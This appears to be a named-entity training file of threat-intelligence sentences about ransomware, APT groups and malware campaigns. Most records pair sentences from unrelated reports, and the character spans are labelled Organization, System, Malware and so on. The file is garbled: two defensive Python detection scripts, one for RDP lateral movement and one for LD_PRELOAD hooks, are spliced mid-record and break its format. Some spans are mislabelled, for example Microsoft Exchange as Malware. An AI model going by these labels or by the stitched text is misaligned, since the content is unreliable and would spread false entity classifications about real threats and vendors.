GandCrab , which is immune to the decryption tools developed for earlier versions of GandCrab and in fact , was deployed the day before the release of the latest decryptor . 
Symantec has to date discovered 49 different organizations in more than 20 countries that have been attacked by Butterfly .", "spans": [{"start": 14, "end": 27, "label": "Organization"}, {"start": 52, "end": 60, "label": "System"}, {"start": 137, "end": 145, "label": "System"}, {"start": 226, "end": 234, "label": "Organization"}]} {"text": "CrowdStrike Intelligence first identified new GandCrab ransomware deployment tactics in mid-February , when a threat actor was observed performing actions on a victim host in order to install GandCrab . Aside from the four companies which have publicly acknowledged attacks , Symantec has identified five other large technology firms compromised by Butterfly , primarily headquartered in the US .", "spans": [{"start": 0, "end": 24, "label": "Organization"}, {"start": 46, "end": 65, "label": "System"}, {"start": 192, "end": 200, "label": "System"}, {"start": 276, "end": 284, "label": "Organization"}, {"start": 317, "end": 333, "label": "Organization"}]} {"text": "Using RDP and stolen credentials from the initially compromised host , the threat actor then proceeded to move laterally around the victim network and was able to deploy GandCrab across several other hosts . In the first attack , Butterfly gained a foothold by first attacking a small European office belonging to one firm and using this infection to then move on to its US office and European headquarters .", "spans": [{"start": 6, "end": 9, "label": "System"}, {"start": 170, "end": 178, "label": "System"}]} {"text": "Near the end of February , CrowdStrike Intelligence observed another incident in which similar manual lateral movement techniques were used to deploy GandCrab across multiple hosts in an enterprise . 
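The RDP-with-stolen-credentials pattern described above (one compromised host, then manual hops to many others before the ransomware is dropped) shows up in Windows Security logs as a single account completing remote-interactive logons (event 4624, LogonType 10) to several different computers in a short window. The detection below is an added example written for this page; it is not CrowdStrike's or any vendor's logic, and it parses a constructed, simplified key=value rendering of 4624/4625 events rather than real EVTX. The host names, the svc_backup and jsmith accounts and the 10.x addresses are invented.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a flattened excerpt of Windows Security events.
# EventID 4624 = successful logon, 4625 = failed logon; LogonType 10 = RemoteInteractive (RDP).
# Hosts, accounts and addresses are made up for this example.
SAMPLE_EVENTS = """\
2019-02-20T01:02:11Z EventID=4624 Computer=FS01 LogonType=10 TargetUserName=svc_backup IpAddress=10.1.4.22
2019-02-20T01:03:40Z EventID=4624 Computer=APP02 LogonType=10 TargetUserName=svc_backup IpAddress=10.1.4.22
2019-02-20T01:05:02Z EventID=4624 Computer=DB01 LogonType=10 TargetUserName=svc_backup IpAddress=10.1.4.22
2019-02-20T01:06:55Z EventID=4624 Computer=DC01 LogonType=10 TargetUserName=svc_backup IpAddress=10.1.4.22
2019-02-20T01:07:30Z EventID=4624 Computer=WS17 LogonType=10 TargetUserName=svc_backup IpAddress=10.1.4.22
2019-02-20T01:09:12Z EventID=4624 Computer=FS01 LogonType=3 TargetUserName=svc_backup IpAddress=10.1.4.22
2019-02-20T09:15:00Z EventID=4624 Computer=WS03 LogonType=10 TargetUserName=jsmith IpAddress=10.2.8.5
2019-02-20T14:40:00Z EventID=4624 Computer=WS03 LogonType=10 TargetUserName=jsmith IpAddress=10.2.8.5
2019-02-20T02:30:00Z EventID=4625 Computer=WS09 LogonType=10 TargetUserName=svc_backup IpAddress=10.1.4.22
"""


def parse_events(text):
    """Turn the key=value lines into dicts; the first token is the UTC timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *pairs = line.split()
        rec = dict(p.split("=", 1) for p in pairs)
        rec["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        events.append(rec)
    return events


def detect_rdp_fan_out(events, window=timedelta(minutes=30), min_hosts=4):
    """Flag (source IP, account) pairs that complete RDP logons (4624 / type 10)
    to at least min_hosts distinct computers inside any sliding window.
    A normal admin session touches one or two hosts; a hands-on-keyboard
    intruder with one stolen credential fans out."""
    by_actor = defaultdict(list)
    for e in events:
        if e.get("EventID") == "4624" and e.get("LogonType") == "10":
            by_actor[(e["IpAddress"], e["TargetUserName"])].append((e["ts"], e["Computer"]))

    alerts = []
    for (src_ip, account), logons in by_actor.items():
        logons.sort()  # oldest first, so each start index opens a window
        for i, (start, _) in enumerate(logons):
            hosts = {host for t, host in logons[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                alerts.append({"source_ip": src_ip, "account": account,
                               "first_seen": start.isoformat(), "hosts": sorted(hosts)})
                break  # one alert per actor is enough
    return alerts


if __name__ == "__main__":
    for a in detect_rdp_fan_out(parse_events(SAMPLE_EVENTS)):
        print(a)
```

Two practical notes. Event 4624 is written on the target host, so this only works over centrally collected logs; on a single box you would see at most one hop. Jump hosts and patch-management accounts fan out legitimately, so allowlist those source addresses rather than raising min_hosts for everyone, and count the excluded 4625 failures separately: a burst of failures from the same source just before the successes is the credential being tried.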
However , technology is not the only sector the group has focused on and Symantec has found evidence that Butterfly has attacked three major European pharmaceutical firms .", "spans": [{"start": 27, "end": 51, "label": "Organization"}, {"start": 150, "end": 158, "label": "System"}, {"start": 210, "end": 220, "label": "Organization"}, {"start": 273, "end": 281, "label": "Organization"}, {"start": 350, "end": 370, "label": "Organization"}]} {"text": "Once Domain Controller access was acquired , Pinchy Spider used the enterprise 's own IT systems management software , LANDesk , to deploy a loader to hosts across the enterprise . Butterfly has also shown an interest in the commodities sector , attacking two major companies involved in gold and oil in late 2014 .", "spans": [{"start": 119, "end": 126, "label": "System"}, {"start": 181, "end": 190, "label": "Organization"}, {"start": 225, "end": 243, "label": "Organization"}, {"start": 288, "end": 292, "label": "Organization"}, {"start": 297, "end": 300, "label": "Organization"}]} {"text": "This loader , known as Phorpiex Downloader , is not specifically tied to GandCrab or PINCHY SPIDER , and it has previously been observed dropping other malware , such as Smoke Bot , Azorult , and XMRig . The company specializes in finance and natural resources specific to that region .", "spans": [{"start": 23, "end": 42, "label": "System"}, {"start": 73, "end": 81, "label": "Organization"}, {"start": 85, "end": 98, "label": "Organization"}, {"start": 170, "end": 179, "label": "System"}, {"start": 182, "end": 189, "label": "System"}, {"start": 196, "end": 201, "label": "System"}, {"start": 231, "end": 238, "label": "Organization"}]} {"text": "As reported in the CrowdStrike 2018 Global Threat Report , big game hunting was a trend that helped define the criminal threat landscape in 2018 . 
The latter was one of at least three law firms Butterfly has targeted over the past three years .", "spans": [{"start": 184, "end": 193, "label": "Organization"}, {"start": 194, "end": 203, "label": "Organization"}]} {"text": "BOSS SPIDER used both enterprise and per-host pricing during their campaigns . In many attacks , the group has succeeded in compromising Microsoft Exchange or Lotus Domino email servers in order to intercept company emails and possibly use them to send counterfeit emails .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 22, "end": 32, "label": "System"}, {"start": 37, "end": 53, "label": "System"}, {"start": 137, "end": 155, "label": "Malware"}, {"start": 159, "end": 185, "label": "Malware"}, {"start": 216, "end": 222, "label": "System"}, {"start": 265, "end": 271, "label": "System"}]} {"text": "Both INDRIK SPIDER ( with BitPaymer ransomware ) and GRIM SPIDER ( with Ryuk ransomware ) have made headlines with their high profile victims and ransom profits , demonstrating that big game hunting is a lucrative enterprise . A powerful threat actor known as \" Wild Neutron \" ( also known as \" Jripbot \" and \" Morpho \" ) has been active since at least 2011 , infecting high profile companies for several years by using a combination of exploits , watering holes and multi-platform malware .", "spans": [{"start": 5, "end": 18, "label": "Organization"}, {"start": 26, "end": 35, "label": "System"}, {"start": 36, "end": 46, "label": "System"}, {"start": 53, "end": 64, "label": "Organization"}, {"start": 72, "end": 87, "label": "System"}, {"start": 295, "end": 302, "label": "Organization"}, {"start": 311, "end": 317, "label": "Organization"}, {"start": 370, "end": 392, "label": "Organization"}]} {"text": "Running successful big game hunting operations results in a higher average profit per victim , allowing adversaries like PINCHY SPIDER and their partners to increase their criminal revenue quickly . 
Based on the profile of the victims and the type of information targeted by the attackers , Symantec believes that Butterfly is financially motivated , stealing information it can potentially profit from .", "spans": [{"start": 291, "end": 299, "label": "Organization"}]} {"text": "The threat actor Rocke was originally revealed by Talos in August of 2018 and many remarkable behaviors were disclosed in their blog post . Wild Neutron hit the spotlight in 2013 , when it successfully infected companies such as Apple , Facebook , Twitter and Microsoft .", "spans": [{"start": 50, "end": 55, "label": "Organization"}, {"start": 229, "end": 234, "label": "Organization"}, {"start": 237, "end": 245, "label": "Organization"}, {"start": 248, "end": 255, "label": "Organization"}, {"start": 260, "end": 269, "label": "Organization"}]} {"text": "The family was suspected to be developed by the Iron cybercrime group and it's also associated with the Xbash malware we reported on in September of 2018 . Wild Neutron 's attacks in 2015 use a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit .", "spans": [{"start": 104, "end": 117, "label": "System"}, {"start": 156, "end": 168, "label": "Organization"}, {"start": 194, "end": 225, "label": "Malware"}, {"start": 249, "end": 260, "label": "Organization"}, {"start": 287, "end": 299, "label": "System"}, {"start": 300, "end": 307, "label": "Vulnerability"}]} {"text": "The threat actor Rocke was first reported by Cisco Talos in late July 2018 . During the 2013 attacks , the Wild Neutron actor successfully compromised and leveraged the website www.iphonedevsdk.com , which is an iPhone developers forum .", "spans": [{"start": 45, "end": 56, "label": "Organization"}]} {"text": "The ultimate goal of this threat is to mine Monero cryptocurrency in compromised Linux machines . 
Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes .", "spans": [{"start": 98, "end": 110, "label": "Organization"}, {"start": 141, "end": 145, "label": "System"}, {"start": 146, "end": 154, "label": "Vulnerability"}, {"start": 155, "end": 162, "label": "Vulnerability"}]} {"text": "To deliver the malware to the victim machines , the Rocke group exploits vulnerabilities in Apache Struts 2 , Oracle WebLogic , and Adobe ColdFusion . While the group used watering hole attacks in 2013 , it's still unclear how victims get redirected to the exploitation kits in the new 2014-2015 attacks .", "spans": [{"start": 52, "end": 88, "label": "Vulnerability"}]} {"text": "Once the C2 connection is established , malware used by the Rocke group downloads shell script named as \" a7 \" to the victim machine . Wild Neutron 's tools include a password harvesting trojan , a reverse-shell backdoor and customized implementations of OpenSSH , WMIC and SMB .", "spans": [{"start": 60, "end": 65, "label": "Organization"}, {"start": 106, "end": 108, "label": "System"}, {"start": 135, "end": 147, "label": "Organization"}, {"start": 167, "end": 193, "label": "Malware"}, {"start": 198, "end": 220, "label": "Malware"}, {"start": 225, "end": 262, "label": "Malware"}, {"start": 265, "end": 269, "label": "Malware"}, {"start": 274, "end": 277, "label": "Malware"}]} {"text": "To be more specific , the malware uninstalls cloud security products by Alibaba Cloud and Tencent Cloud . 
Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b .", "spans": [{"start": 117, "end": 122, "label": "System"}, {"start": 123, "end": 131, "label": "Vulnerability"}, {"start": 201, "end": 205, "label": "System"}, {"start": 206, "end": 214, "label": "Vulnerability"}, {"start": 274, "end": 287, "label": "Organization"}, {"start": 300, "end": 328, "label": "Vulnerability"}]} {"text": "Public cloud infrastructure is one of the main targets for Rocke . The victims for the 2014-2015 versions are generally IT and real estate/investment companies and in both cases , a small number of computers have been infected throughout Wild Neutron .", "spans": [{"start": 59, "end": 64, "label": "Organization"}, {"start": 120, "end": 122, "label": "Organization"}, {"start": 127, "end": 159, "label": "Organization"}, {"start": 238, "end": 250, "label": "Organization"}]} {"text": "FortiGuard Labs has been monitoring a Linux coin mining campaign from \" Rocke \" \u2013 a malware threat group specializing in cryptomining . 
Wild Neutron 's targeting of major IT companies , spyware developers ( FlexiSPY ) , jihadist forums ( the \" Ansar Al-Mujahideen English Forum \" ) and Bitcoin companies indicate a flexible yet unusual mindset and interests .", "spans": [{"start": 0, "end": 15, "label": "Organization"}, {"start": 136, "end": 148, "label": "Organization"}, {"start": 171, "end": 183, "label": "Organization"}, {"start": 186, "end": 204, "label": "Organization"}, {"start": 207, "end": 215, "label": "Organization"}, {"start": 220, "end": 235, "label": "Organization"}, {"start": 244, "end": 277, "label": "Organization"}, {"start": 286, "end": 303, "label": "Organization"}]} {"text": "The malicious bash script components of the malware are hosted in Pastebin , with the profile name \" SYSTEMTEN \" , which is very similar to previous names used by the \" Rocke \" threat group . We continue to track the Wild Neutron group , which is still active as of June 2015 .", "spans": [{"start": 66, "end": 74, "label": "System"}, {"start": 101, "end": 110, "label": "System"}, {"start": 217, "end": 235, "label": "Organization"}]} {"text": "However , around a month ago , Rocke started targeting systems that run Jenkins by attempting to exploit CVE-2018-1000861 and CVE-2019-1003000 . A ransomware variant dubbed PyLocky was observed in September 2018 being distributed by a phishing campaign using an invoicing theme .", "spans": [{"start": 31, "end": 36, "label": "Organization"}, {"start": 105, "end": 121, "label": "Vulnerability"}, {"start": 126, "end": 142, "label": "Vulnerability"}, {"start": 173, "end": 180, "label": "Malware"}]} {"text": "By utilizing a hook library , it is more complicated for users to manually detect and remove the infection from their systems , giving the threat actors more time to generate profit . 
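A "hook library" that makes a Linux infection harder to see and remove is, in practice, usually an LD_PRELOAD-style shared object registered in /etc/ld.so.preload so that every new process loads it and its replacement readdir()/open() hide the miner's files and processes. The page does not say which mechanism Rocke used, so that is an assumption here. The audit below is an added example for this page, not FortiGuard's or the malware's code: it lists every preload entry not on an allowlist and every running process whose environment sets LD_PRELOAD. The library paths, the PID and the file contents in run_demo() are constructed in a temporary directory so the functions can be exercised offline; the same functions can be pointed at the real /etc/ld.so.preload and /proc.

```python
import os
import tempfile


def parse_preload_file(path):
    """Return the library paths listed in an ld.so.preload-style file (one per
    line, or colon/space separated; '#' comments ignored). Missing file -> []."""
    if not os.path.isfile(path):
        return []
    libs = []
    with open(path, "r", errors="replace") as fh:
        for line in fh:
            line = line.split("#", 1)[0].strip()
            if line:
                libs.extend(line.replace(":", " ").split())
    return libs


def audit_preload(preload_path="/etc/ld.so.preload", allowlist=()):
    """Report every preload entry not on the allowlist. On most hosts the file
    should not exist at all, so any entry deserves a look; a dangling path is
    still reported because the file itself is the persistence mechanism."""
    return [{"library": lib, "exists": os.path.isfile(lib)}
            for lib in parse_preload_file(preload_path) if lib not in allowlist]


def find_ld_preload_in_procs(proc_root="/proc"):
    """List (pid, value) for running processes whose environment sets LD_PRELOAD.
    Catches a hook injected per process rather than system-wide."""
    hits = []
    for pid in os.listdir(proc_root):
        if not pid.isdigit():          # skip self, sys, net, ...
            continue
        try:
            with open(os.path.join(proc_root, pid, "environ"), "rb") as fh:
                env = fh.read().split(b"\0")
        except OSError:                # permission denied, or the process exited
            continue
        for var in env:
            if var.startswith(b"LD_PRELOAD="):
                hits.append((int(pid), var[len(b"LD_PRELOAD="):].decode(errors="replace")))
    return hits


def run_demo():
    """Build a constructed preload file and a fake /proc tree in a temp dir and
    audit them. Every path, name and PID below is invented for the example."""
    root = tempfile.mkdtemp(prefix="preload-demo-")
    preload = os.path.join(root, "ld.so.preload")
    with open(preload, "w") as fh:
        fh.write("/usr/local/lib/libfoo.so   # hypothetical dropped hook\n"
                 "/lib/x86_64-linux-gnu/libtrusted.so:/opt/libbar.so\n")
    proc = os.path.join(root, "proc")
    os.makedirs(os.path.join(proc, "4242"))
    os.makedirs(os.path.join(proc, "self"))      # non-numeric entry, must be skipped
    with open(os.path.join(proc, "4242", "environ"), "wb") as fh:
        fh.write(b"PATH=/usr/bin\0LD_PRELOAD=/opt/libbar.so\0HOME=/root\0")
    findings = audit_preload(preload, allowlist=("/lib/x86_64-linux-gnu/libtrusted.so",))
    return findings, find_ld_preload_in_procs(proc)


if __name__ == "__main__":
    print(run_demo())
```

The caveat that matters: a preload hook that filters directory listings can hide its own file and its own line from any dynamically linked tool, this script included, if it is loaded into the Python process. Run the check from a statically linked binary (which never consults ld.so.preload) or from a rescue image with the root filesystem mounted offline, then compare with what `ls` and `ps` report on the live host; the discrepancy is the finding.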
PyLocky was found to be targeting entities in France and Germany .", "spans": [{"start": 15, "end": 27, "label": "System"}, {"start": 184, "end": 191, "label": "Malware"}]} {"text": "The group also made it back into the news with the recent WannaCry ransomware that targeted computers around the globe ; it piggybacked on exploits revealed by the Shadow Brokers . Fxmsp specialize in breaching highly secure protected networks to access private corporate and government information .", "spans": [{"start": 58, "end": 77, "label": "System"}, {"start": 164, "end": 178, "label": "Organization"}, {"start": 181, "end": 186, "label": "Organization"}]} {"text": "A mysterious hacker or hackers going by the name \" The Shadow Brokers \" claims to have hacked a group linked to the NSA and dumped a bunch of its hacking tools . Fxmsp is a hacking collective that has operated in various top-tier Russian- and English-speaking underground communities since 2017 .", "spans": [{"start": 116, "end": 119, "label": "Organization"}, {"start": 162, "end": 167, "label": "Organization"}]} {"text": "The Shadow Brokers claimed to have hacked the Equation Group and stolen some of its hacking tools . Throughout 2017 and 2018 , Fxmsp established a network of trusted proxy resellers to promote their breaches on the criminal underground .", "spans": [{"start": 127, "end": 132, "label": "Organization"}]} {"text": "The Shadow Brokers first emerged in August , when they posted links to a selection of NSA exploits and hacking tools onto Github and other websites . On April 24 , 2019 , Fxmsp claimed to have secured access to three leading antivirus companies .", "spans": [{"start": 86, "end": 98, "label": "Vulnerability"}, {"start": 171, "end": 176, "label": "Organization"}, {"start": 225, "end": 244, "label": "Organization"}]} {"text": "The Shadow Brokers , the group that publicly dumped a cache of NSA hacking tools , appears to be back and ready to sell stolen material on an individual basis . 
According to the Fxmsp , they worked tirelessly for the first quarter of 2019 to breach these companies and finally succeeded and obtained access to the companies' internal networks .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 63, "end": 80, "label": "System"}]} {"text": "Wh1sks estimated that , between June and early August , the Shadow Brokers have made up to $88,000 in an alternative cryptocurrency called Monero . Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body . For example , Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2. This Bisonal variant used in the latest attack communicates with one of the following hard-coded C2 addresses by using the HTTP POST method on TCP PROT 443 . Previous reports have discussed Bisonal malware used in attacks against Japan , South Korea and Russia . This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others . If it's Cyrillic and the command to the shell is not \u2018ipconfig\u2019 , the threat converts the command result text encoding from Cyrillic to UTF-16 . 
Similar to the Bisonal variant targeting the Russian organization , this sample was also disguised as PDF document .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 60, "end": 74, "label": "Organization"}, {"start": 117, "end": 131, "label": "Organization"}, {"start": 148, "end": 167, "label": "Organization"}, {"start": 180, "end": 186, "label": "Organization"}, {"start": 253, "end": 255, "label": "System"}, {"start": 300, "end": 315, "label": "Organization"}, {"start": 385, "end": 392, "label": "Indicator"}, {"start": 477, "end": 479, "label": "System"}, {"start": 523, "end": 526, "label": "Indicator"}, {"start": 570, "end": 585, "label": "Indicator"}, {"start": 659, "end": 665, "label": "Indicator"}, {"start": 788, "end": 792, "label": "Indicator"}, {"start": 793, "end": 801, "label": "Malware"}, {"start": 921, "end": 927, "label": "Malware"}, {"start": 945, "end": 952, "label": "Indicator"}, {"start": 1032, "end": 1035, "label": "System"}]} {"text": "Moreover , Wh1sks was able to find out the email addresses of five people who have subscribed to the Shadow Brokers' monthly dump service . The installed EXE file is almost exactly the same as the DLL version of Bisonal variant used against the Russian organization . The targets are military or defense industry in particular countries , it used DDNS for C2 servers , and tracked connections from their victims by using target or campaign codes , as well as disguising the malware as document file , and using a dropper to install the malware and decoy file . A previous campaign of this APT group was uncovered by Talos in June 2017 , and since then very little of this operation was seen in the wild . ined in the archive is called DriverInstallerU.exe\u201d but its metadata shows that its original name is Interenet Assistant.exe\u201d . 
After reviewing all the malware functionalities , we are confident in saying that the attackers look for victims who answer well-defined characteristics and believe that further stages of the attack are delivered only to those who fit the specific victim profile . In this sample , however , the module names were changed from actors and characters\u2019 names to car models , namely BMW_x1\u201d , BMW_x2\u201d and up to BMW_x8\u201d . But , thanks to the attackers known affection for decoy documents that pose as news summaries , we were able to date the campaign back to March 2018 . With the experience gained from the APT attack that began in March 2017 , it seems this campaign has evolved into an attack with new capabilities , and an even more specific target , over a year later . These unknown actors continued launching DDoS attacks over the next few years . For simplicity , Kaspersky is calling them the BlackEnergy APT group . Since the middle of 2015 , one of the preferred attack vectors for BlackEnergy in Ukraine has been Excel documents with macros that drop the Trojan to disk if the user chooses to run the script in the document . A very good analysis and overview of the BlackEnergy attacks in Ukraine throughout 2014 and 2015 was published by the Ukrainian security firm Cys Centrum the text is only available in Russian for now , but can be read via Google Translate . The earliest signs of destructive payloads with BlackEnergy go back as far as June 2014 . BlackEnergy is a highly dynamic threat actor and the current attacks in Ukraine indicate that destructive actions are on their main agenda , in addition to compromising industrial control installations and espionage activities . Kaspersky will continue to monitor the BlackEnergy attacks in Ukraine and update our readers with more data when available . 
From Buhtrap perpetrating cybercrime for financial gain , its toolset has been expanded with malware used to conduct espionage in Eastern Europe and Central Asia . Throughout our tracking , we've seen this group deploy its main backdoor as well as other tools against various victims , but June 2019 was the first time we saw the Buhtrap group use a zero-day exploit as part of a campaign . In that case , we observed Buhtrap using a local privilege escalation exploit , CVE-2019-1132 , against one of its victims . However , as the shift in targets occurred before the source code leak , we assess with high confidence that the same people behind the first Buhtrap malware attacks against businesses and banks are also involved in targeting governmental institutions . When Buhtrap was targeting businesses , the decoy documents would typically be contracts or invoices . The Buhtrap group is well known for its targeting of financial institutions and businesses in Russia . Figure 2 is a typical example of a generic invoice the group used in a campaign in 2014 . When the group's focus shifted to banks , the decoy documents were related to banking system regulations or advisories from FinCERT , an organization created by the Russian government to provide help and guidance to its financial institutions . We confirmed that this is a DarkHydrus Group's new attack targeting Middle East region . In July 2018 , Palo Alto disclosed DarkHydrus Group which showed its special interest to governments in Middle East . Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus . However , the final payload is something that welivesecurity have never seen associated with Buhtrap . It's coincident that both 'darkhydrus' APT group name and \u2018Williams\u2019 user name in PDB path found in this Twitter user . 
In recent APT incidents , Dark Hydruns tend to adopt Office VBA macro instead of Office 0day vulnerability in the consideration of cost reduction . ASERT uncovered a credential theft campaign we call LUCKY ELEPHANT where attackers masquerade as legitimate entities such as foreign government , telecommunications , and military . From at least February 2019 to present , the actors in the LUCKY ELEPHANT campaign copied webpages to mimic South Asian government websites as well as Microsoft Outlook 365 login pages and hosted them on their own doppelganger domains , presumably to trick victims into providing login credentials . ASERT suspects that the Actors use phishing emails to lure victims to the doppelganger websites and entice users to enter their credentials . It is important to note that one domain , yahoomail[.]cf is only associated with this group from February 2019 onward . In late 2018 , the domain was associated with a different APT group / campaign of Chinese origin . Based on our analysis into the activity , ASERT deems with moderate confidence that an Indian APT group is behind the LUCKY ELEPHANT campaign . The targets are typical of known Indian APT activity and the infrastructure was previously used by an Indian APT group . DoNot Team has a history of heavily targeting Pakistan , in addition to other neighboring countries . The 360 Intelligence Center observed four distinct campaigns against Pakistan since 2017 (link) , recently targeting Pakistani businessmen working in China . 
DoNot Team\u2019s confirmed use of this IP dates back to September 2018 , with a six-month gap until it was used to host doppelganger domains for the LUCKY ELEPHANT campaign in early February .", "spans": [{"start": 11, "end": 17, "label": "Organization"}, {"start": 101, "end": 116, "label": "Organization"}, {"start": 144, "end": 162, "label": "Indicator"}, {"start": 197, "end": 200, "label": "System"}, {"start": 212, "end": 227, "label": "Indicator"}, {"start": 347, "end": 351, "label": "Indicator"}, {"start": 356, "end": 358, "label": "System"}, {"start": 513, "end": 520, "label": "Malware"}, {"start": 616, "end": 621, "label": "Organization"}, {"start": 735, "end": 756, "label": "Indicator"}, {"start": 806, "end": 830, "label": "Indicator"}, {"start": 919, "end": 928, "label": "Organization"}, {"start": 938, "end": 956, "label": "Organization"}, {"start": 1212, "end": 1219, "label": "Indicator"}, {"start": 1222, "end": 1229, "label": "Indicator"}, {"start": 1240, "end": 1247, "label": "Indicator"}, {"start": 1270, "end": 1279, "label": "Organization"}, {"start": 1610, "end": 1624, "label": "Organization"}, {"start": 1701, "end": 1710, "label": "Organization"}, {"start": 1822, "end": 1833, "label": "Organization"}, {"start": 1896, "end": 1902, "label": "Malware"}, {"start": 2109, "end": 2120, "label": "Organization"}, {"start": 2256, "end": 2267, "label": "Organization"}, {"start": 2298, "end": 2309, "label": "Organization"}, {"start": 2527, "end": 2536, "label": "Organization"}, {"start": 2566, "end": 2577, "label": "Organization"}, {"start": 2657, "end": 2664, "label": "Organization"}, {"start": 2842, "end": 2847, "label": "Organization"}, {"start": 2853, "end": 2863, "label": "Organization"}, {"start": 2982, "end": 2989, "label": "Organization"}, {"start": 3070, "end": 3077, "label": "Organization"}, {"start": 3113, "end": 3120, "label": "Vulnerability"}, {"start": 3123, "end": 3136, "label": "Vulnerability"}, {"start": 3310, "end": 3317, "label": 
"Organization"}, {"start": 3342, "end": 3352, "label": "Organization"}, {"start": 3357, "end": 3362, "label": "Organization"}, {"start": 3394, "end": 3419, "label": "Organization"}, {"start": 3427, "end": 3434, "label": "Organization"}, {"start": 3449, "end": 3459, "label": "Organization"}, {"start": 3529, "end": 3536, "label": "Organization"}, {"start": 3578, "end": 3600, "label": "Organization"}, {"start": 3727, "end": 3734, "label": "Organization"}, {"start": 3842, "end": 3849, "label": "Organization"}, {"start": 3991, "end": 4001, "label": "Organization"}, {"start": 4067, "end": 4076, "label": "Organization"}, {"start": 4087, "end": 4097, "label": "Organization"}, {"start": 4141, "end": 4152, "label": "Organization"}, {"start": 4244, "end": 4257, "label": "Vulnerability"}, {"start": 4347, "end": 4357, "label": "Organization"}, {"start": 4406, "end": 4420, "label": "Organization"}, {"start": 4453, "end": 4460, "label": "Organization"}, {"start": 4489, "end": 4501, "label": "Organization"}, {"start": 4521, "end": 4531, "label": "Organization"}, {"start": 4568, "end": 4580, "label": "Organization"}, {"start": 4609, "end": 4621, "label": "Organization"}, {"start": 4636, "end": 4652, "label": "Malware"}, {"start": 4731, "end": 4736, "label": "Organization"}, {"start": 4783, "end": 4797, "label": "Organization"}, {"start": 4856, "end": 4874, "label": "Organization"}, {"start": 4877, "end": 4895, "label": "Organization"}, {"start": 4902, "end": 4910, "label": "Organization"}, {"start": 4972, "end": 4986, "label": "Organization"}, {"start": 5021, "end": 5052, "label": "Organization"}, {"start": 5064, "end": 5081, "label": "Organization"}, {"start": 5213, "end": 5218, "label": "Organization"}, {"start": 5257, "end": 5263, "label": "System"}, {"start": 5661, "end": 5677, "label": "Organization"}, {"start": 5839, "end": 5849, "label": "Organization"}, {"start": 6058, "end": 6079, "label": "Organization"}, {"start": 6099, "end": 6104, "label": "Organization"}, {"start": 
6134, "end": 6136, "label": "Indicator"}]} {"text": "Buried among this new treasure trove , there are several mentions of previously disclosed NSA top secret programs and software such as \" STRAITBIZARRE \" , used to control implants remotely , and \" JEEPFLEA \" , a project to hack the money transferring system SWIFT . One of the IP addresses , 128.127.105.13 , was previously used by the DoNot Team (aka APT-C-35 ) , a suspected Indian APT group .", "spans": [{"start": 31, "end": 36, "label": "System"}, {"start": 90, "end": 93, "label": "Organization"}, {"start": 137, "end": 150, "label": "System"}, {"start": 197, "end": 205, "label": "System"}, {"start": 277, "end": 279, "label": "Indicator"}, {"start": 292, "end": 306, "label": "Indicator"}, {"start": 336, "end": 346, "label": "Organization"}, {"start": 352, "end": 360, "label": "Organization"}]} {"text": "The Shadow Brokers have long claimed that the tools they release are from the \" Equation Group \" , the name of a government hacking group outed by Kaspersky Lab in 2015 , which is widely believed to be the NSA . The actors behind LUCKY ELEPHANT recognize the effectiveness and use doppelganger webpages nearly identical to legitimate sites , enticing users to input their credentials . The heavier targeting in Pakistan adheres to historical targeting and the ongoing tension between the two countries , which has escalated since a terrorist attack in Kashmir on 14 February 2019 . The targeting of Pakistan , Bangladesh , Sri Lanka , Maldives , Myanmar , Nepal , and the Shanghai Cooperation Organization are all historical espionage targets by India . However , it is clear is that Donot are actively establishing infrastructure and are targeting governments in South Asia . First attack of this campaign took place in May 2018 . Arbor also published APT research on this group , and named it \u2018Donot\u2019 . Donot attacked government agencies , aiming for classified intelligence . 
We identified this APT group coded as \u2018APT-C-35\u2019 in 2017 , who is mainly targeting Pakistan and other South Asian countries for Cyber Espionage . At least 4 attack campaigns against Pakistan have been observed by us since 2017 . Spear phishing emails with vulnerable Office documents or malicious macros are sent to victims . In the latest attack , Donot group is targeting Pakistani businessman working in China . Two unique malware frameworks , EHDevel and yty , are developed by attackers . wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 . Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones . From the attack activity captured this time , it is obvious that Donot APT group is still keen on Pakistan as primary target of attack , and even expands scope of attack to include Pakistani staffs and institutions in China . Buhtrap still make extensive use of NSIS installers as droppers and these are mainly delivered through malicious documents . They first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) . Earworm first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) . They were also behind an attack on the World Anti-Doping Agency (WADA) , in which they leaked confidential information about several drug tests . SPLM , GAMEFISH , and Zebrocy delivery all maintain their own clusters , but frequently overlap later . 
Our previous post on Sofacy's 2017 activity stepped away from the previously covered headline buzz presenting their association with previously known political hacks and interest in Europe and the US , and examines their under-reported ongoing activity in middle east , central asia , and now a shift in targeting further east , including China , along with an overlap surprise . The larger , 300kb+ SPLM backdoors deployed in 2016 and 2017 are not observed any longer at targets in 2018 . A previous , removed , report from another vendor claimed non-specific information about the groups' interest in Chinese universities , but that report has been removed \u2013 most likely detections were related to students\u2019 and researchers\u2019 scanning known collected samples and any incidents\u201d remain unconfirmed and unknown . Either way , the group's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion . The actors behind this campaign we call LUCKY ELEPHANT use doppelganger webpages to mimic legitimate entities such as foreign governments , telecommunications , and military . Currently , Sofacy targets large air-defense related commercial organizations in China with SPLM , and moves Zebrocy focus across Armenia , Turkey , Kazakhstan , Tajikistan , Afghanistan , Mongolia 